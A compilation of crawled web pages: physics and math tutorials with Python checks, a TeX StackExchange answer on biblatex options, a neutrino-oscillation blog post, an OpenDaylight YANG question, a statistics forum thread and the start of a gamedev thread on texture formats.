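for px, py in [(0.0, 0.0), (3.0, -2.0), (1.5, 4.0)]:
    assert math.isclose(dist_general(2, -1, 1, px, py),
                        dist_slope_intercept(2, 1, px, py))
```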
Garner gives another proof and equation for the Cartesian coordinate method.[5]
https://www.hackmath.net/en/math-problem/10571?tag_id=35 | # Video game
Nicole is playing a video game where each round lasts 7/12 of an hour. She has scheduled 3 3/4 hours to play the game. How many rounds can Nicole play?
Result
n = 6
#### Solution:
$t_{1} = \dfrac{7}{12} \doteq 0.5833 \text{ h}$
$t_{2} = 3 + \dfrac{3}{4} = \dfrac{15}{4} = 3.75 \text{ h}$
$N = t_{2}/t_{1} = \dfrac{15/4}{7/12} = \dfrac{45}{7} \doteq 6.4286$
$n = \lfloor N \rfloor = \lfloor 6.4286 \rfloor = 6$
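The same computation in Python, using exact fractions to avoid the rounding in the decimal intermediate values:

```python
from fractions import Fraction

round_length = Fraction(7, 12)              # hours per round
scheduled = 3 + Fraction(3, 4)              # 3 3/4 hours = 15/4 hours
N = scheduled / round_length                # exact quotient: 45/7
full_rounds = scheduled // round_length     # floor division on exact rationals

assert N == Fraction(45, 7)
assert full_rounds == 6                     # only complete rounds count
```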
https://physics.tutorvista.com/motion/displacement.html | # Displacement
In physics, mechanics includes the study of the motion of objects. Kinematics is the branch of mechanics that describes this motion using terms, diagrams, graphs, numbers, and equations. Motion is described by mathematical quantities of two types, scalars and vectors, distinguished by their definitions: a scalar is specified by a magnitude (a numerical value) alone, while a vector is specified by both a magnitude and a direction.
Examples of such quantities are acceleration, distance, speed, displacement, and velocity. Distance and displacement are two of these quantities: distance is a scalar giving the total length of the path covered by a moving object, while displacement is a vector giving the net change in the object's position. When we travel from one location to another and want to arrive quickly, we take shortcuts, preferring a straight path over a curved one, because the straight path makes the distance smaller. Both quantities are related to the motion of an object; here we discuss displacement.
## Displacement Definition
Displacement describes the change in position of an object. It is a vector: the overall change in position from the reference point, i.e., the shortest, straight-line path between the initial point and the final point.
From these definitions alone the difference between distance and displacement may not yet be clear, so consider the following example.
Example:
A person walks as follows: (i) for the first 10 seconds, he walks north for 100 meters; (ii) for the next 30 seconds, he turns west and walks 200 meters; (iii) for the next 10 seconds, he turns north again and walks 300 meters. Find the distance travelled and the displacement of the person from his starting point.
Solution: The distance is the total ground the person has covered, so Distance = 100 + 200 + 300 = 600 meters. The displacement is the straight-line separation of the final point B from the starting point A. The net movement is 100 + 300 = 400 meters north and 200 meters west, so the magnitude of the displacement is $\sqrt{400^2+200^2} \approx 447$ meters, directed from A to B.
From this example, we can conclude that the magnitude of the displacement is the shortest distance between two points, and can never exceed the distance travelled.
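The computation can be checked with a short script; representing each leg of the walk as an (east, north) vector makes clear that the westward leg lengthens the path and also shifts the endpoint, so the displacement magnitude is $\sqrt{400^2+200^2}\approx 447$ meters:

```python
import math

# Each leg of the walk as an (east, north) vector, in meters.
legs = [(0, 100), (-200, 0), (0, 300)]

distance = sum(math.hypot(dx, dy) for dx, dy in legs)  # total path length
net_east = sum(dx for dx, _ in legs)                   # net east displacement
net_north = sum(dy for _, dy in legs)                  # net north displacement
displacement = math.hypot(net_east, net_north)         # magnitude of net change

assert distance == 600
assert abs(displacement - math.sqrt(400**2 + 200**2)) < 1e-9  # about 447.2 m
```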
## Formula
There is no single formula for displacement, it depends on the other quantities present in the problem. Still, there are a few formulae using which we can find the displacement.
S = vt (uniform velocity)
S = ut + $\frac{1}{2}$at$^{2}$ (uniform acceleration)
where v is the uniform velocity, u is the initial velocity and a is the acceleration.
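Both formulae are straightforward to evaluate (a Python sketch; the numbers below are illustrative, not taken from the text):

```python
def displacement_uniform(v, t):
    # S = v t, for motion at constant velocity v during time t
    return v * t

def displacement_accelerated(u, a, t):
    # S = u t + (1/2) a t^2, for initial velocity u and constant acceleration a
    return u * t + 0.5 * a * t ** 2

print(displacement_uniform(10, 30))       # 300
print(displacement_accelerated(0, 2, 5))  # 25.0
```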
## Distance vs Displacement
• Distance, as already discussed, is a scalar quantity: the total (actual) path length covered by the object between the initial and final points. Displacement is the shortest path between the two points and is a vector quantity.
• Both are measured in units of length. Distance is generally associated with the speed of the body, while displacement is associated with its velocity.
• The magnitude of the displacement is at most equal to the distance; the two coincide only when the object moves along a straight line without reversing direction.
## Angular Displacement
When an object is moving in a circular or curved path, its displacement is measured as the change of angle from its initial position to the final position. This displacement is known as angular displacement. It is measured in radians.
The angular displacement is the angle $\theta$ between the initial and final positions of the object moving along the curved path.
The relation between linear displacement and angular displacement is
S = r $\theta$
where, r = radius of the curve along which object is moving
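For example (a Python sketch with an illustrative radius):

```python
import math

def linear_from_angular(r, theta):
    # S = r * theta, with theta in radians
    return r * theta

# A point at radius 0.5 m sweeping half a revolution (theta = pi rad):
print(round(linear_from_angular(0.5, math.pi), 4))  # 1.5708
```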
## Displacement Vector
Let us consider the motion of an object from point A to point B as shown in the figure.
The actual path covered by the object is shown by the thick curved line, while the straight line from A to B denotes the displacement and is known as the displacement vector.
## Resultant Displacement
The term 'resultant' itself means sum or total. So the resultant displacement is the vector sum of all the displacements that have taken place.
## Can Displacement Be Negative?
From the above discussion we know that displacement is a vector quantity, i.e., it has both magnitude and direction. A negative displacement does not mean that the displacement is decreasing; it means that the displacement is in the opposite direction. Hence the negative sign indicates that the object has moved opposite to the chosen positive direction from its initial position.
## Examples
### Solved Examples
Question 1: A car is moving with a uniform velocity of 10 m/s. It travels east, starting from point A, for 30 seconds, and then it turns left and moves for another 40 seconds. Find its resultant displacement.
Solution:
While traveling east it covers a distance of 300 meters (10 $\times$ 30 = 300). When it turns left it moves north for another 40 seconds, so the distance it covers in the north direction is 400 meters (10 $\times$ 40 = 400). The figure of this motion is as shown:
We know that the displacement is the shortest distance between two points.
Since the figure is a right-angled triangle, the resultant displacement will be
AB = $\sqrt{AO^{2} + OB^{2}}$
= $\sqrt{300^{2} + 400^{2}}$
= 500 m.
Question 2: A man is walking from his office to his home. He exits the office and walks 400 m west. He then turns and walks 700 m north. Determine the magnitude and direction of his resultant displacement.
Solution:
His resultant displacement is given by :
S = $\sqrt{400^{2}+700^{2}}$
S = $\sqrt{160000 + 490000}$
S = $\sqrt{650000}$
S = 806.23 meters.
Although his total distance traveled is 1100 meters, his resultant displacement is only 806.23 meters, directed towards the north-west.
Question 3: A bus is heading to city B from city A via city C. The bus starts from city A and moves towards city C, a distance of 100 km to the south. It then turns left and moves for another 200 km before reaching city B. Find the total distance traveled by the bus and the magnitude and direction of the displacement of the bus from city A.
Solution:
1. Total distance traveled by the bus is D = 100 + 200 = 300 km.
2. Magnitude of the displacement is,
|S| = $\sqrt{100^{2} + 200^{2}}$,
= $\sqrt {50000}$,
|S| = 223.61 kms.
3. Direction of the resultant displacement: the bus first travels south and then turns left; since it was facing south, a left turn points it east, so the resultant direction from city A is south-east.
Question 4: A boy is walking to his school, starting out in the direction opposite to his house, which is situated to the north. He travels away from his house for 100 meters, then turns right and travels 200 meters, and again turns right and travels 50 meters. Find the total distance covered by him and the magnitude and direction of his displacement.
Solution:
1. Total distance covered by him is: 100 + 200 + 50 = 350 meters.
2. Magnitude of the displacement can be obtained by visualizing his walking,
Fig – 4
The distance from A to B is 100 meters,
from B to C is 200 meters and from C to D is 50 meters.
So, the magnitude of resultant displacement is,
|S| = $\sqrt{50^{2} + 200^{2}}$
= $\sqrt{42500}$
|S| = 206.155 m.
3. The direction of the resultant displacement is South–West.
https://testbook.com/question-answer/the-drift-velocity-of-electrons-in-a-current-carry--5fa2935d32bf8660e0630ced | # The drift velocity of electrons in a current-carrying wire of cross-sectional area A and current I is v. If the electric current and the cross-sectional area is doubled then-new drift velocity will-
This question was previously asked in
Airforce Group X 4 November 2020 Memory Based Paper
View all Airforce Group X Papers >
1. become 2 times
2. become 4 times
3. become half
4. remain same
## Answer (Detailed Solution Below)
Option 4 : remain same
## Detailed Solution
The correct option is 4
CONCEPT
Drift velocity: In a material, the average velocity attained by charged particles due to an electric field is called the drift velocity.
Drift velocity of the electrons is calculated by:
$$\Rightarrow v_d=\frac{I}{neA}$$
Where I = current in the wire, n = number density of free electrons in the wire, A = cross-sectional area of the wire, and e = charge on one electron
CALCULATION:
Drift velocity of electrons in a current-carrying wire of cross-sectional area A and current I is
$$\Rightarrow v=\frac{I}{neA}$$
Drift velocity of the electron, when the electric current and the cross-sectional area are both doubled, is
$$\Rightarrow v'=\frac{I'}{neA'}=\frac{2I}{2neA}=v$$
$$[\because v=\frac{I}{neA}]$$
Therefore the new drift velocity will remain the same. Hence option 4 is correct. | 2021-10-25 08:36:40 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6117103099822998, "perplexity": 2028.477272885571}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-43/segments/1634323587655.10/warc/CC-MAIN-20211025061300-20211025091300-00288.warc.gz"} |
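The cancellation can also be checked numerically (a Python sketch; the copper-like values of n and A below are illustrative assumptions, not part of the question):

```python
import math

E_CHARGE = 1.602e-19  # electron charge in coulombs

def drift_velocity(current, n, area):
    # v_d = I / (n e A)
    return current / (n * E_CHARGE * area)

v1 = drift_velocity(current=2.0, n=8.5e28, area=1.0e-6)
v2 = drift_velocity(current=4.0, n=8.5e28, area=2.0e-6)  # I and A both doubled
print(math.isclose(v1, v2, rel_tol=1e-12))  # True: the factors of 2 cancel
```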
https://www.openaircraft.com/ccx-doc/cgx/node9.html | ## Keyboard
The keyboard is used for command-line input and for specifying the type of entities when selecting them with the mouse pointer. The command line is preferable in situations where pure mouse operation is not convenient (i.e. to define a certain value) or for batch-controlled operations. Therefore most commands are only available over the command line. The stream coming from the keyboard is echoed in the parent konsole, but during typing the mouse pointer must stay inside the main window; otherwise the commands will not be recognized by the program. The user might use the menu function “Toggle CommandLine” or the command “view cl” to switch the command line from the konsole to the graphics window.
The following special keys are used:
Special Keys:
ARROW_UP: previous command
ARROW_DOWN: next command
PAGE_UP: entities of the previous set (if the last command was plot or plus) or the previous Loadcase
PAGE_DOWN: entities of the next set (if the last command was plot or plus) or the next Loadcase
https://tex.stackexchange.com/questions/483707/how-to-detect-whether-the-option-citecounter-was-enabled-on-biblatex | How to detect whether the option citecounter was enabled on biblatex?
I think this is the definition of the citecounter option in the biblatex package:
\DeclareBibliographyOption[boolean]{citecounter}[true]{%
\ifcsdef{blx@opt@citecounter@#1}
{\csuse{blx@opt@citecounter@#1}}
{\blx@err@invopt{citecounter=#1}{}}}
\def\blx@opt@citecounter@true{%
\let\blx@setcitecounter\blx@setcitecounter@global
\let\blx@citecounter\blx@citecounter@global
\let\abx@aux@count\blx@aux@count
\let\abx@aux@fncount\blx@aux@fncount
\booltrue{citetracker}}
\def\blx@opt@citecounter@context{%
\let\blx@setcitecounter\blx@setcitecounter@context
\let\blx@citecounter\blx@citecounter@context
\let\abx@aux@count\blx@aux@count
\let\abx@aux@fncount\blx@aux@fncount
\booltrue{citetracker}}
\def\blx@opt@citecounter@false{%
\let\blx@setcitecounter\relax
\let\blx@citecounter\relax
\let\abx@aux@count\@gobbletwo
\let\abx@aux@fncount\@gobbletwo}
Then, what can I use to know whether the option was enabled?
For example:
\usepackage[style=abnt,language=english,citecounter=false]{biblatex}
\if citecounter=false
\message{Citecounter is false^^J}
\else
\message{Citecounter is enabled^^J}
\fi
The quoted definition shows that \blx@citecounter is equal to \relax if and only if the citecounter feature is deactivated. So you can check for that.
One way would be
\ifcsvoid{blx@citecounter}
{NO CITECOUNTER}
{CITECOUNTER}
(Technically, \ifcsvoid{blx@citecounter} tests if \blx@citecounter is \relax or a parameterless macro with empty replacement, but that should be good enough here.)
If you want to stick to TeX conditionals
\makeatletter
\ifx\blx@citecounter\relax
NO CITECOUNTER%
\else
CITECOUNTER%
\fi
\makeatother
would also work.
In addition to citecounter, I can also check whether backref was set. Given the source for the backref option in the biblatex package:
\DeclareBibliographyOption[boolean]{backref}[true]{%
\ifstrequal{#1}{true}
{\let\abx@aux@backref\blx@aux@backref
\booltrue{backtracker}}
{\let\blx@backref\@gobble
\let\abx@aux@backref\@gobblefive
\boolfalse{backtracker}}}
I can check whether both citetracker and backref were set with:
\usepackage[style=abnt,language=english,backend=biber,citecounter=true]{biblatex}
\makeatletter
\ifx\blx@citecounter\relax
\message{citecounter not defined!^^J}
\else
\message{citecounter defined!^^J}
\fi
\makeatother
\ifcitetracker
\message{citetracker defined!^^J}
\else
\message{citetracker not defined!^^J}
\fi
\ifbacktracker
\message{backref defined!^^J}
\else
\message{backref not defined!^^J}
\fi
• Note that the citetracker bool as tested with \ifcitetracker is activated by several options (citecounter being one of them) and need not mean that the tracking option citetracker has been enabled. – moewe Apr 8 at 7:05 | 2019-10-20 07:02:39 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8649119734764099, "perplexity": 6562.44856389449}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-43/segments/1570986703625.46/warc/CC-MAIN-20191020053545-20191020081045-00164.warc.gz"} |
https://thespectrumofriemannium.wordpress.com/tag/right-handed-neutrinos/ | # LOG#126. Basic Neutrinology(XI).
Why is the case of massive neutrinos so relevant in contemporary physics? The full answer to this question would be very long. In fact, I am writing this long thread about neutrinology so that you can understand it a little better. If neutrinos do have nonzero masses, then, due to the basic postulates of quantum theory, there will be a “linear combination” or “mixing” among all the possible “states”. The same happens with quarks! This mixing is observable even at macroscopic distances from the production point or source, and it has very important practical consequences ONLY if the differences of the squared neutrino masses are very small. Mathematically speaking, $\Delta m_{ij}^2=m_i^2-m_j^2$. Typically, $\Delta m_{ij}\leq 1eV$, but some “subtle details” can increase this upper bound up to the keV scale (in the case of sterile or right-handed neutrinos, undetected till now).
In the presence of neutrino masses, the so-called “weak eigenstates” are different to “mass eigenstates”. There is a “transformation” or “mixing”/”oscillation” between them. This phenomenon is described by some unitary matrix U. The idea is:
$\mbox{Neutrino masses}\neq 0\longrightarrow \mbox{Transitions between neutrino mass eigenstates}$
$\mbox{Transitions between mass eigenstates}\longrightarrow \mbox{Neutrino mixing matrix}$
$\mbox{Neutrino mixing matrix}\longrightarrow \mbox{Neutrino oscillations}$
If neutrinos can only be created and detected as a result of weak processes, at origin (or any arbitrary point) we have a weak eigenstate as a “rotation” of a mass eigenstate through the mixing matrix U:
$\boxed{\vert \nu_w (0)\rangle =U\vert \nu_m (0)\rangle}$
In this post, I am only going to introduce the elementary theory of neutrino oscillations (NO or NOCILLA)/neutrino mixing (NOMIX) from a purely heuristic viewpoint. I will be using natural units with $\hbar=c=1$.
If we ignore the effects of the neutrino spin, after some time the system will evolve into the next state (recall we use elementary hamiltonian evolution from quantum mechanics here):
$\vert \nu_m (t)\rangle=\exp \left( -iHt\right)\vert \nu_m (0)\rangle$
and where $H$ is the free hamiltonian of the system, i.e., in vacuum. It will be characterized by certain eigenvalues
$H=\mbox{diag}(\ldots,E_i,\ldots)$
and here, using special relativity, we write $E_i^2=p_i^2+m_i^2$
In most of the interesting cases (when $E\sim MeV$ and $m\sim eV$), this relativistic dispersion relationship $E=E(p,m)$ can be approximated by the next expression (it is the celebrated “ultra-relativistic” approximation):
$p\simeq E$
$E\simeq p+\dfrac{m^2}{2p}$
The effective neutrino hamiltonian can be written as
$H_{eff}=\mbox{diag}(\ldots,m_i^2,\ldots)/2E$
and
$\vert \nu_w (t)\rangle=U\exp \left(-iH_{eff}t\right)U^+\vert \nu_w (0)\rangle=\exp \left(-iH_w^{eff}t\right)\vert \nu_w (0)\rangle$
In this last equation, we write
$H_w^{eff}\equiv \dfrac{M^2}{2E}$
with
$M^2\equiv U\mbox{diag}\left(\ldots,m_i^2,\ldots\right)U^+$
We can perform this derivation in a more rigorous mathematical framework, but I am not going to do it here today. The resulting theory of neutrino mixing and neutrino oscillations (NO) has a beautiful correspondence with Neutrino OScillation EXperiments (NOSEX). These experiments are usually analyzed under the simplest assumption of two-flavor mixing, or equivalently, of neutrino oscillations between just 2 neutrino species, since in this case the process is easier to understand. In such a case, the neutrino mixing matrix U becomes a simple 2-dimensional orthogonal rotation matrix depending on a single parameter $\theta$, the oscillation angle. If we repeat all the computations above in this simple case, we find the probability that a weak interaction eigenstate neutrino $\vert \nu_w\rangle$ has oscillated into another weak interaction eigenstate, say $\vert \nu_w'\rangle$, after the neutrino travels some distance $l=ct$ (remember we are supposing the neutrinos are “almost” massless, so they move very close to the speed of light). Taking $\nu_w=\nu_e$ and $\nu_w'=\nu_\mu$,
(1) $\boxed{P(\nu_e\longrightarrow \nu_\mu;l)=\sin^22\theta\sin^2\left(\dfrac{l}{l_{osc}}\right)}$
This important formula describes the probability of NO in the 2-flavor case. It is a very important and useful result! There, we have defined the oscillation length as
$\dfrac{l}{l_{osc}}\equiv\dfrac{\Delta m^2 l}{4E}$
with $\Delta m^2=m_1^2-m_2^2$. In practical units, we have
(2) $\boxed{\dfrac{l}{l_{osc}}=\dfrac{\Delta m^2 l}{4E}\simeq 1.27\dfrac{\Delta m^2(eV^2)l(m)}{E(MeV)}=1.27\dfrac{\Delta m^2(eV^2)l(km)}{E(GeV)}}$
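Equations (1) and (2) are simple to evaluate numerically (a Python sketch; the mixing angle and the beam parameters below are illustrative values, not taken from the text):

```python
import math

def p_oscillation(theta, dm2_ev2, length_km, energy_gev):
    # P(nu_e -> nu_mu) = sin^2(2*theta) * sin^2(1.27 * dm2[eV^2] * l[km] / E[GeV]),
    # i.e. Eq. (1) with the practical phase of Eq. (2).
    phase = 1.27 * dm2_ev2 * length_km / energy_gev
    return math.sin(2.0 * theta) ** 2 * math.sin(phase) ** 2

# Degenerate masses (dm2 = 0) give zero oscillation probability:
print(p_oscillation(math.pi / 4, 0.0, 500.0, 1.0))  # 0.0

# Maximal mixing (theta = pi/4) at a phase of pi/2 gives probability 1:
energy = 1.27 * 2.5e-3 * 500.0 * 2.0 / math.pi  # choose E so the phase is pi/2
print(round(p_oscillation(math.pi / 4, 2.5e-3, 500.0, energy), 6))  # 1.0
```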
As you can observe, the probabilities depend on two factors: the mixing (oscillation) angle and a kinematical factor that is a function of the traveled distance, the momentum of the neutrinos and the mass difference between the two species. If this mass difference were shown to be non-existent, the phenomenon of neutrino oscillation would not be possible (it would have 0 probability!). To observe neutrino oscillation, we have to make (observe) neutrinos for which some of these parameters are “big”, so that the probability is significant. Interestingly, we can have different kinds of neutrino oscillation experiments according to how large these parameters are. Namely:
-Long baseline experiments (LBE). This class of NOSEX happens whenever you have an oscillation length of order $l\sim 10^{2}km$ or bigger. Even the oscillations of solar neutrinos (neutrinos emitted by the Sun) and of neutrinos from other astrophysical sources can be understood as experiments of this kind. Neutrino beam experiments belong to this category as well.
-Short baseline experiments (SBE). This class of NOSEX happens whenever the distances the neutrinos travel are smaller than some hundreds of kilometers. Of course, the dividing line is conventional. Reactor experiments like KamLAND in Japan (Daya Bay in China, or RENO in South Korea) are experiments of this type.
Moreover, beyond reactor experiments, you also have neutrino beam experiments (T2K, $NO\nu A$, OPERA,…). Neutrino telescopes or detectors like IceCube are the next generation of neutrino “observers” after SuperKamiokande (SuperKamiokande will become HyperKamiokande in the near future, stay tuned!).
In summary, the phenomenon of neutrino mixing/neutrino oscillations/changing neutrino flavor makes the neutrino a very special particle in quantum and relativistic theories. Neutrinos are one of the best tools or probes to study matter, since they only interact through the weak interaction and gravity! Therefore, neutrinos are a powerful “laboratory” in which we can test or search for new physics (the fact that neutrinos are massive is, that said, a proof of new physics beyond the SM, since the SM neutrinos are massless!). Indeed, the phenomenon is purely quantum and (special) relativistic, since neutrinos are tiny particles moving very fast. We have seen the main ideas behind this phenomenon and the main classes of neutrino experiments (long baseline and short baseline experiments). Moreover, we also have “passive” neutrino detectors like SuperKamiokande, IceCube and many others I will not quote here. They study neutrino oscillations by detecting atmospheric neutrinos (the result of cosmic rays hitting the atmosphere), solar neutrinos and neutrinos from other astrophysical sources (like supernovae!). I have talked about cosmic relic neutrinos in the previous post too. Aren’t you convinced that neutrinos are cool? They are “metamorphic”, they have flavor, they are everywhere!
See you in my next neutrinological post!
# LOG#124. Basic Neutrinology(IX).
In supersymmetric LR models, inflation, baryogenesis (and/or leptogenesis) and neutrino oscillations can be closely related to each other. Baryosynthesis in GUTs is, in general, inconsistent with inflationary scenarios: the exponential expansion during the inflationary phase will wash out any baryon asymmetry generated previously at any GUT scale in your theory. One way around this obstacle is the following idea: you can generate the baryon or lepton asymmetry during the process of reheating at the end of inflation. This is a quite non-trivial mechanism. In this case, the physics of the “fundamental” scalar field that drives inflation, the so-called inflaton, would have to violate the CP symmetry, just as we know that weak interactions do! The challenge of any baryosynthesis model is to predict the observed asymmetry. It is generally written as a baryon-to-photon (in fact, a baryon-to-entropy) ratio. The baryon asymmetry is defined as
$\dfrac{n_B}{s}\equiv \dfrac{(n_b-n_{\bar{b}})}{s}$
At the present time, there is only matter and only a very tiny (if any) amount of antimatter, so $n_{\bar{b}}\sim 0$. The entropy density s is completely dominated by the contribution of relativistic particles, so it is proportional to the photon number density. This number is calculated from CMBR measurements, and it turns out to be about $s=7.05n_\gamma$. Thus,
$\dfrac{n_B}{s}\propto \dfrac{n_b}{n_\gamma}$
From BBN, we know that
$\dfrac{n_B}{n_\gamma}=(5.1\pm 0.3)\cdot 10^{-10}$
and
$\dfrac{n_B}{s}=(7.2\pm 0.4)\cdot 10^{-11}$
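These numbers are mutually consistent, as a one-line check shows (a Python sketch using the $s\simeq 7.05 n_\gamma$ relation quoted above):

```python
nb_over_ngamma = 5.1e-10   # n_B / n_gamma from BBN
entropy_factor = 7.05      # s = 7.05 * n_gamma (from CMBR measurements)

nb_over_s = nb_over_ngamma / entropy_factor
print(f"{nb_over_s:.2e}")  # 7.23e-11, matching the quoted (7.2 +/- 0.4) x 10^-11
```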
This value allows one to obtain the observed lepton asymmetry ratio by analogous reasoning.
By the other hand, it has been shown that the “hybrid inflation” scenarios can be successfully realized in certain SUSY LR models with gauge groups
$G_{SUSY}\supset G_{PS}=SU(4)_c\times SU(2)_L\times SU(2)_R$
after SUSY symmetry breaking. This group is sometimes called the Pati-Salam group. The inflaton sector of this model is formed by two complex scalar fields, $H$ and $\theta$. At the end of inflation they oscillate close to the SUSY minimum and decay, respectively, into right-handed sneutrinos $\nu_i^c$ and neutrinos. Moreover, a primordial lepton asymmetry is generated by the decay of the superfield $\nu_2^c$ emerging as a decay product of the inflaton field. The superfield $\nu_2^c$ also decays into electroweak Higgs particles and (anti)lepton superfields. This lepton asymmetry is partially converted into baryon asymmetry by non-perturbative sphalerons!
Remark: (Sphalerons). From the Wikipedia entry we read that a sphaleron (Greek: σφαλερός “weak, dangerous”) is a static (time-independent) solution to the electroweak field equations of the SM of particle physics, and it is involved in processes that violate baryon and lepton number. Such processes cannot be represented by Feynman graphs, and are therefore called non-perturbative effects in the electroweak theory (an untested prediction right now). Geometrically, a sphaleron is simply a saddle point of the electroweak potential energy (in the infinite-dimensional field space), much like the saddle point of the surface $z(x,y)=x^2-y^2$ in three-dimensional analytic geometry. In the standard model, sphaleron processes convert three baryons to three antileptons, and related processes. This violates conservation of baryon number and lepton number, but the difference B-L is conserved. In fact, a sphaleron may convert baryons to anti-leptons and anti-baryons to leptons, and hence a quark may be converted to 2 anti-quarks and an anti-lepton, and an anti-quark may be converted to 2 quarks and a lepton. A sphaleron is similar to the midpoint ($\tau=0$) of the instanton, so it is non-perturbative. This means that under normal conditions sphalerons are unobservably rare. However, they would have been more common at the higher temperatures of the early Universe.
The resulting lepton asymmetry can be written as a function of a number of parameters, among them the neutrino masses and the mixing angles, and finally this result can be compared with the observational constraints on the baryon asymmetry given above. However, this topic is highly non-trivial. It is not trivial that solutions satisfying the constraints above and other physical requirements can be found with natural values of the model parameters. In particular, it turns out that the values of the neutrino masses and mixing angles which predict sensible values for the baryon or lepton asymmetry are also consistent with the values required to solve the solar neutrino problem we have mentioned in this thread.
https://ask.opendaylight.org/question/4892/how-do-i-augment-an-experimenter-meter-band/ | # How do I augment an experimenter meter band?
I'm looking to augment the meter-band-experimenter in Lithium (released version). I found a reference on how to do this for actions, though it appears to be out of date (Openflow Protocol Library extensibility). The reason I say that is that the imports don't appear to be valid anymore.
I've tried the following:
import opendaylight-meter-types {
prefix meter;
}
identity my-meter-band {
base meter:meter-band;
}
Compiling that I do see the Java subclass of MeterBand created. I used that as the action example appears to use the base type. Perhaps I should be using meter:meter-band-experimenter here.
It is not clear how the string following the augment keyword was derived in the referenced action augmentation (though again, it looks like those referenced YANG files are out of date).
I want to do something like:
augment "/meter:?what here?" {
ext:augment-identifier "my-exp-meter-band";
leaf my-value {
type uint16;
}
}
Any idea on:
1. What to use as the base (meter-band or meter-band-experimenter or something else)?
2. What magic string to put after the augment keyword?
3. Does this has any chance of working (e.g. known not to be supported in Lithium)?
4. Are there any examples of this that I missed out there?
I know that next-steps are to add a serializer/deserializer as shown in the referenced document. When I get the meter config currently for the band that needs to be augmented, I'm seeing the error below so at least it looks promising. If one of the maintainers is looking, note the typo below ("ale" instead of "are"):
2015-08-18 17:02:20,420 | WARN | entLoopGroup-8-2 | OFDecoder | 175 - org.opendaylight.openflowjava.openflow-protocol-impl - 0.6.0.Lithium | Message deserialization failed
It seems I've meandered into uncharted territory. This facility is not elaborated in the Lithium release. Will look at what it takes to do so.
http://mathhelpforum.com/advanced-statistics/116305-find-asympto-distribution-mle.html | # Thread: find asympto. distribution of MLE
1. ## find asympto. distribution of MLE
give me a path to do the last part
2. I get for the log likelihood function
$\ln L=-n\ln(1-e^{-\lambda})-n\lambda+\sum X_i\ln\lambda-\ln(\prod (X_i!))$
The derivative wrt lambda is
${-ne^{-\lambda} \over 1-e^{-\lambda}}-n+{\sum X_i\over \lambda}$
set this equal to zero and divide by n ...
${\bar X\over \lambda}={1 \over 1-e^{-\lambda}}$
I don't think we can find a closed-form expression for the MLE of $\lambda$, say $\hat \lambda$.
But I don't think they want you to either. | 2017-04-24 10:34:31 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 5, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9004802703857422, "perplexity": 932.7439067663814}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-17/segments/1492917119225.38/warc/CC-MAIN-20170423031159-00320-ip-10-145-167-34.ec2.internal.warc.gz"} |
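Following up: the stationarity condition $\bar X/\lambda = 1/(1-e^{-\lambda})$ has no closed-form solution, but it is easy to solve numerically (a Python sketch; the sample mean $\bar X = 2$ is an illustrative value):

```python
import math

def truncated_mean(lam):
    # E[X] for the zero-truncated Poisson model above: lambda / (1 - e^(-lambda))
    return lam / (1.0 - math.exp(-lam))

def mle_lambda(xbar, tol=1e-12):
    # Solve truncated_mean(lam) = xbar by bisection. truncated_mean is
    # increasing, tends to 1 as lam -> 0+, and always exceeds lam, so for
    # xbar > 1 the root is bracketed by (0, xbar).
    lo, hi = 1e-9, xbar
    while hi - lo > tol:
        mid = 0.5 * (lo + hi)
        if truncated_mean(mid) < xbar:
            lo = mid
        else:
            hi = mid
    return 0.5 * (lo + hi)

lam_hat = mle_lambda(2.0)
print(round(lam_hat, 4))  # 1.5936
```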
https://www.gamedev.net/forums/topic/506247-why-do-game-companies-use-custom-texture-formats-instead-of-the-dds-format/?page=3 | # Why do game companies use custom texture formats instead of the DDS format?
## Recommended Posts
Numsgil 501
Quote:
Original post by Yann L
Quote:
I would argue a different way: DXT lets you use higher resolution textures with the same file size as a smaller resolution model. That is, if I use DXT5, I can use a 1024x1024 image where a 512x512 image was before, without any additional costs in terms of performance or VRAM.
